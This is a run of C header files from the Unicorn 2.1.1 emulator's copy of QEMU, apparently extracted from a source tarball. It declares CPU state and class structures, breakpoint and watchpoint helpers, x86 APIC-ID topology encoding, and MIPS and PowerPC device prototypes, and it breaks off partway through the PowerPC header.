/* * QEMU CPU model * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #ifndef QEMU_CPU_H #define QEMU_CPU_H #include <stdint.h> #include "exec/hwaddr.h" #include "exec/memattrs.h" #include "qemu/bitmap.h" #include "qemu/queue.h" #include "qemu/thread.h" /** * vaddr: * Type wide enough to contain any #target_ulong virtual address. */ typedef uint64_t vaddr; #define VADDR_PRId PRId64 #define VADDR_PRIu PRIu64 #define VADDR_PRIo PRIo64 #define VADDR_PRIx PRIx64 #define VADDR_PRIX PRIX64 #define VADDR_MAX UINT64_MAX typedef enum MMUAccessType { MMU_DATA_LOAD = 0, MMU_DATA_STORE = 1, MMU_INST_FETCH = 2 } MMUAccessType; typedef struct CPUWatchpoint CPUWatchpoint; struct TranslationBlock; /** * CPUClass: * @class_by_name: Callback to map -cpu command line model name to an * instantiatable CPU type. * @has_work: Callback for checking if there is work to do. * @do_interrupt: Callback for interrupt handling.
* @do_unaligned_access: Callback for unaligned access handling, if * the target defines #TARGET_ALIGNED_ONLY. * @do_transaction_failed: Callback for handling failed memory transactions * (ie bus faults or external aborts; not MMU faults) * @get_arch_id: Callback for getting architecture-dependent CPU ID. * @get_paging_enabled: Callback for inquiring whether paging is enabled. * @get_memory_mapping: Callback for obtaining the memory mappings. * @set_pc: Callback for setting the Program Counter register. This * should have the semantics used by the target architecture when * setting the PC from a source such as an ELF file entry point; * for example on Arm it will also set the Thumb mode bit based * on the least significant bit of the new PC value. * If the target behaviour here is anything other than "set * the PC register to the value passed in" then the target must * also implement the synchronize_from_tb hook. * @synchronize_from_tb: Callback for synchronizing state from a TCG * #TranslationBlock. This is called when we abandon execution * of a TB before starting it, and must set all parts of the CPU * state which the previous TB in the chain may not have updated. * This always includes at least the program counter; some targets * will need to do more. If this hook is not implemented then the * default is to call @set_pc(tb->pc). * @tlb_fill: Callback for handling a softmmu tlb miss or user-only * address fault. For system mode, if the access is valid, call * tlb_set_page and return true; if the access is invalid, and * probe is true, return false; otherwise raise an exception and * do not return. For user-only mode, always raise an exception * and do not return. * @get_phys_page_debug: Callback for obtaining a physical address. * @get_phys_page_attrs_debug: Callback for obtaining a physical address and the * associated memory transaction attributes to use for the access. * CPUs which use memory transaction attributes should implement this * instead of get_phys_page_debug. * @asidx_from_attrs: Callback to return the CPU AddressSpace to use for * a memory access with the specified memory transaction attributes. * @debug_check_watchpoint: Callback: return true if the architectural * watchpoint whose address has matched should really fire. * @debug_excp_handler: Callback for handling debug exceptions. * @cpu_exec_enter: Callback for cpu_exec preparation. * @cpu_exec_exit: Callback for cpu_exec cleanup. * @cpu_exec_interrupt: Callback for processing interrupts in cpu_exec. * @adjust_watchpoint_address: Perform a target-specific adjustment to an * address before attempting to match it against watchpoints. * * Represents a CPU family or model. */ typedef struct CPUClass { /* no DeviceClass->reset(), add here. 
*/ void (*reset)(CPUState *cpu); bool (*has_work)(CPUState *cpu); void (*do_interrupt)(CPUState *cpu); void (*do_unaligned_access)(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); int64_t (*get_arch_id)(CPUState *cpu); bool (*get_paging_enabled)(const CPUState *cpu); void (*get_memory_mapping)(CPUState *cpu, MemoryMappingList *list); void (*set_pc)(CPUState *cpu, vaddr value); void (*synchronize_from_tb)(CPUState *cpu, struct TranslationBlock *tb); bool (*tlb_fill)(CPUState *cpu, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); bool (*tlb_fill_cpu)(CPUState *cpu, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); hwaddr (*get_phys_page_debug)(CPUState *cpu, vaddr addr); hwaddr (*get_phys_page_attrs_debug)(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); int (*asidx_from_attrs)(CPUState *cpu, MemTxAttrs attrs); bool (*debug_check_watchpoint)(CPUState *cpu, CPUWatchpoint *wp); void (*debug_excp_handler)(CPUState *cpu); void (*cpu_exec_enter)(CPUState *cpu); void (*cpu_exec_exit)(CPUState *cpu); bool (*cpu_exec_interrupt)(CPUState *cpu, int interrupt_request); vaddr (*adjust_watchpoint_address)(CPUState *cpu, vaddr addr, int len); void (*tcg_initialize)(struct uc_struct *uc); } CPUClass; /* * Low 16 bits: number of cycles left, used only in icount mode. * High 16 bits: Set to -1 to force TCG to stop executing linked TBs * for this CPU and return to its top level loop (even in non-icount mode). * This allows a single read-compare-cbranch-write sequence to test * for both decrementer underflow and exceptions. */ typedef union IcountDecr { uint32_t u32; struct { #ifdef HOST_WORDS_BIGENDIAN uint16_t high; uint16_t low; #else uint16_t low; uint16_t high; #endif } u16; } IcountDecr; typedef struct CPUBreakpoint { vaddr pc; int flags; /* BP_* */ QTAILQ_ENTRY(CPUBreakpoint) entry; } CPUBreakpoint; struct CPUWatchpoint { vaddr vaddr; vaddr len; vaddr hitaddr; MemTxAttrs hitattrs; int flags; /* BP_* */ QTAILQ_ENTRY(CPUWatchpoint) entry; }; #define TB_JMP_CACHE_BITS 12 #define TB_JMP_CACHE_SIZE (1 << TB_JMP_CACHE_BITS) /* work queue */ /* The union type allows passing of 64 bit target pointers on 32 bit * hosts in a single parameter */ typedef union { int host_int; unsigned long host_ulong; void *host_ptr; vaddr target_ptr; } run_on_cpu_data; #define RUN_ON_CPU_HOST_PTR(p) ((run_on_cpu_data){.host_ptr = (p)}) #define RUN_ON_CPU_HOST_INT(i) ((run_on_cpu_data){.host_int = (i)}) #define RUN_ON_CPU_HOST_ULONG(ul) ((run_on_cpu_data){.host_ulong = (ul)}) #define RUN_ON_CPU_TARGET_PTR(v) ((run_on_cpu_data){.target_ptr = (v)}) #define RUN_ON_CPU_NULL RUN_ON_CPU_HOST_PTR(NULL) typedef void (*run_on_cpu_func)(CPUState *cpu, run_on_cpu_data data); struct qemu_work_item; #define CPU_UNSET_NUMA_NODE_ID -1 #define CPU_TRACE_DSTATE_MAX_EVENTS 32 /** * CPUState: * @cpu_index: CPU index (informative). * @cluster_index: Identifies which cluster this CPU is in. * For boards which don't define clusters or for "loose" CPUs not assigned * to a cluster this will be UNASSIGNED_CLUSTER_INDEX; otherwise it will * be the same as the cluster-id property of the CPU object's TYPE_CPU_CLUSTER * QOM parent. * @nr_cores: Number of cores within this CPU package. * @nr_threads: Number of threads within this CPU. * @running: #true if CPU is currently running (lockless). * @has_waiter: #true if a CPU is currently waiting for the cpu_exec_end; * valid under cpu_list_lock. 
* @created: Indicates whether the CPU thread has been successfully created. * @interrupt_request: Indicates a pending interrupt request. * @halted: Nonzero if the CPU is in suspended state. * @stop: Indicates a pending stop request. * @stopped: Indicates the CPU has been artificially stopped. * @unplug: Indicates a pending CPU unplug request. * @crash_occurred: Indicates the OS reported a crash (panic) for this CPU * @singlestep_enabled: Flags for single-stepping. * @icount_extra: Instructions until next timer event. * @can_do_io: Nonzero if memory-mapped IO is safe. Deterministic execution * requires that IO only be performed on the last instruction of a TB * so that interrupts take effect immediately. * @cpu_ases: Pointer to array of CPUAddressSpaces (which define the * AddressSpaces this CPU has) * @num_ases: number of CPUAddressSpaces in @cpu_ases * @as: Pointer to the first AddressSpace, for the convenience of targets which * only have a single AddressSpace * @env_ptr: Pointer to subclass-specific CPUArchState field. * @icount_decr_ptr: Pointer to IcountDecr field within subclass. * @next_cpu: Next CPU sharing TB cache. * @opaque: User data. * @mem_io_pc: Host Program Counter at which the memory was accessed. * @work_mutex: Lock to prevent multiple access to queued_work_*. * @queued_work_first: First asynchronous work pending. * @trace_dstate_delayed: Delayed changes to trace_dstate (includes all changes * to @trace_dstate). * @trace_dstate: Dynamic tracing state of events for this vCPU (bitmask). * @ignore_memory_transaction_failures: Cached copy of the MachineState * flag of the same name: allows the board to suppress calling of the * CPU do_transaction_failed hook function. * * State of one CPU core or thread. */ struct CPUState { int nr_cores; int nr_threads; struct QemuThread *thread; #ifdef _WIN32 HANDLE hThread; #endif #if 0 int thread_id; bool running, has_waiter; struct QemuCond *halt_cond; bool thread_kicked; #endif bool created; bool stop; bool stopped; bool unplug; bool crash_occurred; bool exit_request; bool in_exclusive_context; uint32_t cflags_next_tb; /* updates protected by BQL */ uint32_t interrupt_request; int singlestep_enabled; int64_t icount_budget; int64_t icount_extra; uint64_t random_seed; sigjmp_buf jmp_env; CPUAddressSpace *cpu_ases; int num_ases; AddressSpace *as; MemoryRegion *memory; void *env_ptr; /* CPUArchState */ IcountDecr *icount_decr_ptr; /* Accessed in parallel; all accesses must be atomic */ struct TranslationBlock *tb_jmp_cache[TB_JMP_CACHE_SIZE]; QTAILQ_ENTRY(CPUState) node; /* ice debug support */ QTAILQ_HEAD(, CPUBreakpoint) breakpoints; QTAILQ_HEAD(, CPUWatchpoint) watchpoints; CPUWatchpoint *watchpoint_hit; void *opaque; /* In order to avoid passing too many arguments to the MMIO helpers, * we store some rarely used information in the CPU context. */ uintptr_t mem_io_pc; /* Used for events with 'vcpu' and *without* the 'disabled' properties */ DECLARE_BITMAP(trace_dstate_delayed, CPU_TRACE_DSTATE_MAX_EVENTS); DECLARE_BITMAP(trace_dstate, CPU_TRACE_DSTATE_MAX_EVENTS); /* TODO Move common fields from CPUArchState here. */ int cpu_index; int cluster_index; uint32_t halted; uint32_t can_do_io; int32_t exception_index; struct uc_struct* uc; /* pointer to CPUArchState.cc */ struct CPUClass *cc; // Set to force TCG to stop executing linked TBs for this // CPU and return to its top level loop. 
volatile sig_atomic_t tcg_exit_req; }; #define CPU(obj) ((CPUState *)(obj)) #define CPU_CLASS(class) ((CPUClass *)class) #define CPU_GET_CLASS(obj) (((CPUState *)obj)->cc) static inline void cpu_tb_jmp_cache_clear(CPUState *cpu) { unsigned int i; for (i = 0; i < TB_JMP_CACHE_SIZE; i++) { cpu->tb_jmp_cache[i] = NULL; } } /** * cpu_paging_enabled: * @cpu: The CPU whose state is to be inspected. * * Returns: %true if paging is enabled, %false otherwise. */ bool cpu_paging_enabled(const CPUState *cpu); /** * cpu_get_memory_mapping: * @cpu: The CPU whose memory mappings are to be obtained. * @list: Where to write the memory mappings to. */ void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list); /** * CPUDumpFlags: * @CPU_DUMP_CODE: * @CPU_DUMP_FPU: dump FPU register state, not just integer * @CPU_DUMP_CCOP: dump info about TCG QEMU's condition code optimization state */ enum CPUDumpFlags { CPU_DUMP_CODE = 0x00010000, CPU_DUMP_FPU = 0x00020000, CPU_DUMP_CCOP = 0x00040000, }; /** * cpu_get_phys_page_attrs_debug: * @cpu: The CPU to obtain the physical page address for. * @addr: The virtual address. * @attrs: Updated on return with the memory transaction attributes to use * for this access. * * Obtains the physical page corresponding to a virtual one, together * with the corresponding memory transaction attributes to use for the access. * Use it only for debugging because no protection checks are done. * * Returns: Corresponding physical page address or -1 if no page found. */ static inline hwaddr cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs) { CPUClass *cc = CPU_GET_CLASS(cpu); if (cc->get_phys_page_attrs_debug) { return cc->get_phys_page_attrs_debug(cpu, addr, attrs); } /* Fallback for CPUs which don't implement the _attrs_ hook */ *attrs = MEMTXATTRS_UNSPECIFIED; return cc->get_phys_page_debug(cpu, addr); } /** * cpu_get_phys_page_debug: * @cpu: The CPU to obtain the physical page address for. * @addr: The virtual address. * * Obtains the physical page corresponding to a virtual one. * Use it only for debugging because no protection checks are done. * * Returns: Corresponding physical page address or -1 if no page found. */ static inline hwaddr cpu_get_phys_page_debug(CPUState *cpu, vaddr addr) { MemTxAttrs attrs = { 0 }; return cpu_get_phys_page_attrs_debug(cpu, addr, &attrs); } /** cpu_asidx_from_attrs: * @cpu: CPU * @attrs: memory transaction attributes * * Returns the address space index specifying the CPU AddressSpace * to use for a memory access with the given transaction attributes. */ static inline int cpu_asidx_from_attrs(CPUState *cpu, MemTxAttrs attrs) { CPUClass *cc = CPU_GET_CLASS(cpu); int ret = 0; if (cc->asidx_from_attrs) { ret = cc->asidx_from_attrs(cpu, attrs); assert(ret < cpu->num_ases && ret >= 0); } return ret; } /** * cpu_reset: * @cpu: The CPU whose state is to be reset. */ void cpu_reset(CPUState *cpu); /** * cpu_has_work: * @cpu: The vCPU to check. * * Checks whether the CPU has work to do. * * Returns: %true if the CPU has work, %false otherwise. */ static inline bool cpu_has_work(CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); g_assert(cc->has_work); return cc->has_work(cpu); } /** * cpu_is_stopped: * @cpu: The CPU to check. * * Checks whether the CPU is stopped. * * Returns: %true if run state is not running or if artificially stopped; * %false otherwise. 
*/ bool cpu_is_stopped(CPUState *cpu); typedef void (*CPUInterruptHandler)(CPUState *, int); extern CPUInterruptHandler cpu_interrupt_handler; /** * cpu_interrupt: * @cpu: The CPU to set an interrupt on. * @mask: The interrupts to set. * * Invokes the interrupt handler. */ static inline void cpu_interrupt(CPUState *cpu, int mask) { cpu_interrupt_handler(cpu, mask); } #ifdef NEED_CPU_H static inline void cpu_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->do_unaligned_access(cpu, addr, access_type, mmu_idx, retaddr); } #endif /* NEED_CPU_H */ /** * cpu_set_pc: * @cpu: The CPU to set the program counter for. * @addr: Program counter value. * * Sets the program counter for a CPU. */ static inline void cpu_set_pc(CPUState *cpu, vaddr addr) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->set_pc(cpu, addr); } /** * cpu_reset_interrupt: * @cpu: The CPU to clear the interrupt on. * @mask: The interrupt mask to clear. * * Resets interrupts on the vCPU @cpu. */ void cpu_reset_interrupt(CPUState *cpu, int mask); /** * cpu_exit: * @cpu: The CPU to exit. * * Requests the CPU @cpu to exit execution. */ void cpu_exit(CPUState *cpu); /** * cpu_resume: * @cpu: The CPU to resume. * * Resumes CPU, i.e. puts CPU into runnable state. */ void cpu_resume(CPUState *cpu); /** * qemu_init_vcpu: * @cpu: The vCPU to initialize. * * Initializes a vCPU. */ void qemu_init_vcpu(CPUState *cpu); #define SSTEP_ENABLE 0x1 /* Enable simulated HW single stepping */ #define SSTEP_NOIRQ 0x2 /* Do not use IRQ while single stepping */ #define SSTEP_NOTIMER 0x4 /* Do not use Timers while single stepping */ /* Breakpoint/watchpoint flags */ #define BP_MEM_READ 0x01 #define BP_MEM_WRITE 0x02 #define BP_MEM_ACCESS (BP_MEM_READ | BP_MEM_WRITE) #define BP_STOP_BEFORE_ACCESS 0x04 /* 0x08 currently unused */ #define BP_GDB 0x10 #define BP_CPU 0x20 #define BP_ANY (BP_GDB | BP_CPU) #define BP_WATCHPOINT_HIT_READ 0x40 #define BP_WATCHPOINT_HIT_WRITE 0x80 #define BP_WATCHPOINT_HIT (BP_WATCHPOINT_HIT_READ | BP_WATCHPOINT_HIT_WRITE) int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, CPUBreakpoint **breakpoint); int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags); void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint); void cpu_breakpoint_remove_all(CPUState *cpu, int mask); /* Return true if PC matches an installed breakpoint. */ static inline bool cpu_breakpoint_test(CPUState *cpu, vaddr pc, int mask) { CPUBreakpoint *bp; if (unlikely(!QTAILQ_EMPTY(&cpu->breakpoints))) { QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { if (bp->pc == pc && (bp->flags & mask)) { return true; } } } return false; } int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, int flags, CPUWatchpoint **watchpoint); int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, int flags); void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint); void cpu_watchpoint_remove_all(CPUState *cpu, int mask); void cpu_check_watchpoint(CPUState *cpu, vaddr addr, vaddr len, MemTxAttrs attrs, int flags, uintptr_t ra); int cpu_watchpoint_address_matches(CPUState *cpu, vaddr addr, vaddr len); /** * cpu_get_address_space: * @cpu: CPU to get address space from * @asidx: index identifying which address space to get * * Return the requested address space of this CPU. @asidx * specifies which address space to read.
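 * A sketch of how this pairs with cpu_asidx_from_attrs() above
 * (illustrative only):
 *     int asidx = cpu_asidx_from_attrs(cpu, MEMTXATTRS_UNSPECIFIED);
 *     AddressSpace *as = cpu_get_address_space(cpu, asidx);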
*/ AddressSpace *cpu_get_address_space(CPUState *cpu, int asidx); void QEMU_NORETURN cpu_abort(CPUState *cpu, const char *fmt, ...) GCC_FMT_ATTR(2, 3); void cpu_exec_initfn(CPUState *cpu); void cpu_exec_realizefn(CPUState *cpu); void cpu_exec_unrealizefn(CPUState *cpu); /** * target_words_bigendian: * Returns true if the (default) endianness of the target is big endian, * false otherwise. Note that in target-specific code, you can use * TARGET_WORDS_BIGENDIAN directly instead. On the other hand, common * code should normally never need to know about the endianness of the * target, so please do *not* use this function unless you know very well * what you are doing! */ bool target_words_bigendian(void); /* use original func name. */ void cpu_class_init(struct uc_struct *uc, CPUClass *k); void cpu_common_initfn(struct uc_struct *uc, CPUState *cs); void cpu_stop(struct uc_struct *uc); #define UNASSIGNED_CPU_INDEX -1 #define UNASSIGNED_CLUSTER_INDEX -1 #endif
unicorn-2.1.1/qemu/include/hw/i386/topology.h
/* * x86 CPU topology data structures and functions * * Copyright (c) 2012 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE.
 */
#ifndef HW_I386_TOPOLOGY_H
#define HW_I386_TOPOLOGY_H

/* This file implements the APIC-ID-based CPU topology enumeration logic,
 * documented in:
 * Intel® 64 Architecture Processor Topology Enumeration
 * http://software.intel.com/en-us/articles/intel-64-architecture-processor-topology-enumeration/
 *
 * This code should be compatible with AMD's "Extended Method" described at:
 * AMD CPUID Specification (Publication #25481)
 * Section 3: Multiple Core Calculation
 * as long as:
 *  nr_threads is set to 1;
 *  OFFSET_IDX is assumed to be 0;
 *  CPUID Fn8000_0008_ECX[ApicIdCoreIdSize[3:0]] is set to apicid_core_width().
 */

#include "qemu/bitops.h"

/* APIC IDs can be 32-bit, but beware: APIC IDs > 255 require x2APIC support */
typedef uint32_t apic_id_t;

typedef struct X86CPUTopoIDs {
    unsigned pkg_id;
    unsigned node_id;
    unsigned die_id;
    unsigned core_id;
    unsigned smt_id;
} X86CPUTopoIDs;

typedef struct X86CPUTopoInfo {
    unsigned nodes_per_pkg;
    unsigned dies_per_pkg;
    unsigned cores_per_die;
    unsigned threads_per_core;
} X86CPUTopoInfo;

/* Return the bit width needed for 'count' IDs */
static unsigned apicid_bitwidth_for_count(unsigned count)
{
    g_assert(count >= 1);
    count -= 1;
    return count ? 32 - clz32(count) : 0;
}

/* Bit width of the SMT_ID (thread ID) field on the APIC ID */
static inline unsigned apicid_smt_width(X86CPUTopoInfo *topo_info)
{
    return apicid_bitwidth_for_count(topo_info->threads_per_core);
}

/* Bit width of the Core_ID field */
static inline unsigned apicid_core_width(X86CPUTopoInfo *topo_info)
{
    return apicid_bitwidth_for_count(topo_info->cores_per_die);
}

/* Bit width of the Die_ID field */
static inline unsigned apicid_die_width(X86CPUTopoInfo *topo_info)
{
    return apicid_bitwidth_for_count(topo_info->dies_per_pkg);
}

/* Bit width of the node_id field per socket */
static inline unsigned apicid_node_width_epyc(X86CPUTopoInfo *topo_info)
{
    return apicid_bitwidth_for_count(MAX(topo_info->nodes_per_pkg, 1));
}

/* Bit offset of the Core_ID field */
static inline unsigned apicid_core_offset(X86CPUTopoInfo *topo_info)
{
    return apicid_smt_width(topo_info);
}

/* Bit offset of the Die_ID field */
static inline unsigned apicid_die_offset(X86CPUTopoInfo *topo_info)
{
    return apicid_core_offset(topo_info) + apicid_core_width(topo_info);
}

/* Bit offset of the Pkg_ID (socket ID) field */
static inline unsigned apicid_pkg_offset(X86CPUTopoInfo *topo_info)
{
    return apicid_die_offset(topo_info) + apicid_die_width(topo_info);
}

#define NODE_ID_OFFSET 3 /* Minimum node_id offset if NUMA is configured */

/*
 * Bit offset of the node_id field
 *
 * nodes_per_pkg must be > 0 if NUMA is configured, and zero otherwise.
 */
static inline unsigned apicid_node_offset_epyc(X86CPUTopoInfo *topo_info)
{
    unsigned offset = apicid_die_offset(topo_info) +
                      apicid_die_width(topo_info);

    if (topo_info->nodes_per_pkg) {
        return MAX(NODE_ID_OFFSET, offset);
    } else {
        return offset;
    }
}

/* Bit offset of the Pkg_ID (socket ID) field */
static inline unsigned apicid_pkg_offset_epyc(X86CPUTopoInfo *topo_info)
{
    return apicid_node_offset_epyc(topo_info) +
           apicid_node_width_epyc(topo_info);
}

/*
 * Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID
 *
 * The caller must make sure core_id < nr_cores and smt_id < nr_threads.
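 *
 * Worked example (values are illustrative, not from the original
 * comment): with nodes_per_pkg = 0, dies_per_pkg = 1, cores_per_die = 4
 * and threads_per_core = 2, the SMT field is 1 bit wide, the core field
 * 2 bits, and the die and node fields collapse to 0 bits, so
 * pkg_id = 1, core_id = 2, smt_id = 1 encodes to
 * (1 << 3) | (2 << 1) | 1 = 0xd.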
*/ static inline apic_id_t x86_apicid_from_topo_ids_epyc(X86CPUTopoInfo *topo_info, const X86CPUTopoIDs *topo_ids) { return (topo_ids->pkg_id << apicid_pkg_offset_epyc(topo_info)) | (topo_ids->node_id << apicid_node_offset_epyc(topo_info)) | (topo_ids->die_id << apicid_die_offset(topo_info)) | (topo_ids->core_id << apicid_core_offset(topo_info)) | topo_ids->smt_id; } static inline void x86_topo_ids_from_idx_epyc(X86CPUTopoInfo *topo_info, unsigned cpu_index, X86CPUTopoIDs *topo_ids) { unsigned nr_nodes = MAX(topo_info->nodes_per_pkg, 1); unsigned nr_dies = topo_info->dies_per_pkg; unsigned nr_cores = topo_info->cores_per_die; unsigned nr_threads = topo_info->threads_per_core; unsigned cores_per_node = DIV_ROUND_UP((nr_dies * nr_cores * nr_threads), nr_nodes); topo_ids->pkg_id = cpu_index / (nr_dies * nr_cores * nr_threads); topo_ids->node_id = (cpu_index / cores_per_node) % nr_nodes; topo_ids->die_id = cpu_index / (nr_cores * nr_threads) % nr_dies; topo_ids->core_id = cpu_index / nr_threads % nr_cores; topo_ids->smt_id = cpu_index % nr_threads; } /* * Calculate thread/core/package IDs for a specific topology, * based on APIC ID */ static inline void x86_topo_ids_from_apicid_epyc(apic_id_t apicid, X86CPUTopoInfo *topo_info, X86CPUTopoIDs *topo_ids) { topo_ids->smt_id = apicid & ~(0xFFFFFFFFUL << apicid_smt_width(topo_info)); topo_ids->core_id = (apicid >> apicid_core_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_core_width(topo_info)); topo_ids->die_id = (apicid >> apicid_die_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_die_width(topo_info)); topo_ids->node_id = (apicid >> apicid_node_offset_epyc(topo_info)) & ~(0xFFFFFFFFUL << apicid_node_width_epyc(topo_info)); topo_ids->pkg_id = apicid >> apicid_pkg_offset_epyc(topo_info); } /* * Make APIC ID for the CPU 'cpu_index' * * 'cpu_index' is a sequential, contiguous ID for the CPU. */ static inline apic_id_t x86_apicid_from_cpu_idx_epyc(X86CPUTopoInfo *topo_info, unsigned cpu_index) { X86CPUTopoIDs topo_ids; x86_topo_ids_from_idx_epyc(topo_info, cpu_index, &topo_ids); return x86_apicid_from_topo_ids_epyc(topo_info, &topo_ids); } /* Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID * * The caller must make sure core_id < nr_cores and smt_id < nr_threads. 
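 *
 * For instance (illustrative numbers): with dies_per_pkg = 2,
 * cores_per_die = 4 and threads_per_core = 2 the field widths are
 * 1 (die), 2 (core) and 1 (SMT) bit, so pkg_id = 1, die_id = 1,
 * core_id = 3, smt_id = 0 encodes to
 * (1 << 4) | (1 << 3) | (3 << 1) = 0x1e.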
*/ static inline apic_id_t x86_apicid_from_topo_ids(X86CPUTopoInfo *topo_info, const X86CPUTopoIDs *topo_ids) { return (topo_ids->pkg_id << apicid_pkg_offset(topo_info)) | (topo_ids->die_id << apicid_die_offset(topo_info)) | (topo_ids->core_id << apicid_core_offset(topo_info)) | topo_ids->smt_id; } /* Calculate thread/core/package IDs for a specific topology, * based on (contiguous) CPU index */ static inline void x86_topo_ids_from_idx(X86CPUTopoInfo *topo_info, unsigned cpu_index, X86CPUTopoIDs *topo_ids) { unsigned nr_dies = topo_info->dies_per_pkg; unsigned nr_cores = topo_info->cores_per_die; unsigned nr_threads = topo_info->threads_per_core; topo_ids->pkg_id = cpu_index / (nr_dies * nr_cores * nr_threads); topo_ids->die_id = cpu_index / (nr_cores * nr_threads) % nr_dies; topo_ids->core_id = cpu_index / nr_threads % nr_cores; topo_ids->smt_id = cpu_index % nr_threads; } /* Calculate thread/core/package IDs for a specific topology, * based on APIC ID */ static inline void x86_topo_ids_from_apicid(apic_id_t apicid, X86CPUTopoInfo *topo_info, X86CPUTopoIDs *topo_ids) { topo_ids->smt_id = apicid & ~(0xFFFFFFFFUL << apicid_smt_width(topo_info)); topo_ids->core_id = (apicid >> apicid_core_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_core_width(topo_info)); topo_ids->die_id = (apicid >> apicid_die_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_die_width(topo_info)); topo_ids->pkg_id = apicid >> apicid_pkg_offset(topo_info); } /* Make APIC ID for the CPU 'cpu_index' * * 'cpu_index' is a sequential, contiguous ID for the CPU. */ static inline apic_id_t x86_apicid_from_cpu_idx(X86CPUTopoInfo *topo_info, unsigned cpu_index) { X86CPUTopoIDs topo_ids; x86_topo_ids_from_idx(topo_info, cpu_index, &topo_ids); return x86_apicid_from_topo_ids(topo_info, &topo_ids); } #endif /* HW_I386_TOPOLOGY_H */ ���������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/mips/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017164�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/mips/cpudevs.h��������������������������������������������������������0000664�0000000�0000000�00000001033�14675241067�0021003�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef HW_MIPS_CPUDEVS_H #define HW_MIPS_CPUDEVS_H #include "target/mips/cpu-qom.h" /* Definitions for MIPS CPU internal devices. 
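 *
 * (Orientation note, an assumption rather than part of this header:
 * kseg0 is the unmapped, cached 512 MiB window at virtual 0x80000000,
 * so the addr.c helpers declared below amount to masking the virtual
 * address with 0x1fffffff and, in the other direction, merging the
 * kseg0 base back in.)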
*/ /* addr.c */ uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr); uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr); uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr); bool mips_um_ksegs_enabled(void); void mips_um_ksegs_enable(void); /* mips_int.c */ void cpu_mips_irq_init_cpu(MIPSCPU *cpu); /* mips_timer.c */ void cpu_mips_clock_init(MIPSCPU *cpu); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/ppc/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016776�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/ppc/ppc.h�������������������������������������������������������������0000664�0000000�0000000�00000010716�14675241067�0017736�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef HW_PPC_H #define HW_PPC_H #include "target/ppc/cpu-qom.h" void ppc_set_irq(PowerPCCPU *cpu, int n_IRQ, int level); PowerPCCPU *ppc_get_vcpu_by_pir(int pir); int ppc_cpu_pir(PowerPCCPU *cpu); /* PowerPC hardware exceptions management helpers */ typedef void (*clk_setup_cb)(void *opaque, uint32_t freq); typedef struct clk_setup_t clk_setup_t; struct clk_setup_t { clk_setup_cb cb; void *opaque; }; static inline void clk_setup (clk_setup_t *clk, uint32_t freq) { if (clk->cb != 